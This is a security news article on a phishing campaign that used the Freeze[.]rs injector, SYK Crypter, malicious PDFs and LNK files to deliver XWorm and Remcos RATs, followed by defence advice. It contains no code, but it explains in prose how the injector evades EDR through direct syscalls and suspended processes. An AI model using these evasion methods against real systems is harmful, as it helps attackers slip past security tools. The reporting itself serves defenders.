The Rise of XWorm and Remcos RAT: A Lethal Threat to Critical Infrastructure

Weaponized Rust-based Injector Used in Sophisticated Phishing Campaign

Introduction

In a recent discovery by Fortinet’s FortiGuard Labs, a sophisticated phishing campaign targeting victims in Europe and North America has been uncovered. The campaign utilizes a Rust-based injector called Freeze[.]rs and involves the distribution of malware through a malicious PDF file that evades endpoint detection and response (EDR) systems. The analysis conducted by Fortinet has revealed the involvement of multiple malware, including XWorm and Remcos RAT, pointing to the complexity and sophistication of the attack.

Attack Chain and Techniques

The investigation by FortiGuard Labs reveals that the Freeze[.]rs injector, originally intended for bypassing EDR security measures, plays a crucial role in the attack chain. The attacker employs a booby-trapped PDF file and the “search-ms” protocol to deliver the payload. This JavaScript code, utilizing the “search-ms” functionality, redirects users to a remote server via a Windows Explorer Window. To deceive victims, a deceptive LNK file disguised as a PDF icon is used, making it appear as if the file comes from their own system.

Cara Lin, a researcher at FortiGuard Labs, explains that the Freeze[.]rs injector achieves its evasion by calling NT syscalls to inject the shellcode while skipping the standard calls in Kernel base dll that could be hooked. By creating a process in a suspended state, minimal DLLs are loaded, and no EDR-specific DLLs are loaded, ensuring that the syscalls within Ntdll.dll remain unaltered. This tactic takes advantage of the lag that occurs before EDR systems start hooking and altering the assembly of system DLLs within a process.

The attack also utilizes the involvement of SYK Crypter, a tool commonly used to distribute malware via the Discord community chat platform. The crypter plays a role in loading Remcos, a sophisticated remote access Trojan adept at controlling and monitoring Windows devices. The SYK Crypter copies itself to the Startup folder for persistence and encrypts the configuration during encoding and decrypts it upon execution. It also encrypts the compressed payload in the resource for obfuscation, increasing the complexity and challenge for static analysis. The malware employs a multi-layered strategy involving encoding, string obfuscation, and payload encryption.

Implications and Risks

This phishing campaign highlights the evolving threat of phishing and other messaging-based attacks. The research notes that 97% of companies have experienced at least one email phishing attack in the past 12 months, with significant costs expected from these attacks. Phishing attacks are becoming smarter and more targeted, adapting to new technology, user behavior, and utilizing techniques like mobile exploits, brand impersonation, and AI-generated content.

The use of sophisticated malware like XWorm and Remcos RAT can lead to severe consequences for the victims, including the loading of ransomware and the establishment of persistent backdoors in compromised systems. The involvement of the Freeze[.]rs injector and SYK Crypter demonstrates the ability of attackers to adopt and weaponize existing tools and technologies for their malicious campaigns.

Defending Against Phishing Attacks

As the threat of phishing attacks continues to grow, it is crucial for individuals and organizations to implement effective defense measures. The research highlights several recommendations to mitigate the risk of phishing:

1. Maintain up-to-date software: Keeping all software, including operating systems and applications, up-to-date is critical for closing vulnerabilities that attackers may exploit. Regularly installing security patches and updates can help protect against known vulnerabilities used in phishing attacks.

2. Provide regular training: Educating employees and individuals about the various techniques used in phishing attacks is essential. Regular training can help users identify suspicious emails, attachments, and links, minimizing the likelihood of falling victim to phishing attempts.

3. Use advanced security tools: Deploying advanced security tools such as email filters, firewalls, and anti-malware software can provide an additional layer of protection against phishing campaigns. These tools can help detect and block malicious emails, attachments, and URLs.

4. Conduct phishing simulation training: Phishing simulation training, particularly in critical infrastructure organizations, has shown promising results. By exposing employees to simulated phishing attacks and providing feedback and training, organizations can improve their ability to recognize and report real malicious emails.

Conclusion

The weaponization of the Rust-based injector Freeze[.]rs in a sophisticated phishing campaign highlights the evolving tactics employed by cybercriminals. The use of multiple layers of obfuscation, encryption, and deception techniques demonstrates the level of sophistication exhibited by attackers.

To mitigate the risk of falling victim to phishing attacks, individuals and organizations must prioritize internet security through regular software updates, employee training, and the utilization of advanced security tools. By implementing these measures, individuals and organizations can better defend against the mounting phishing risk and protect themselves from the potentially devastating consequences of these attacks.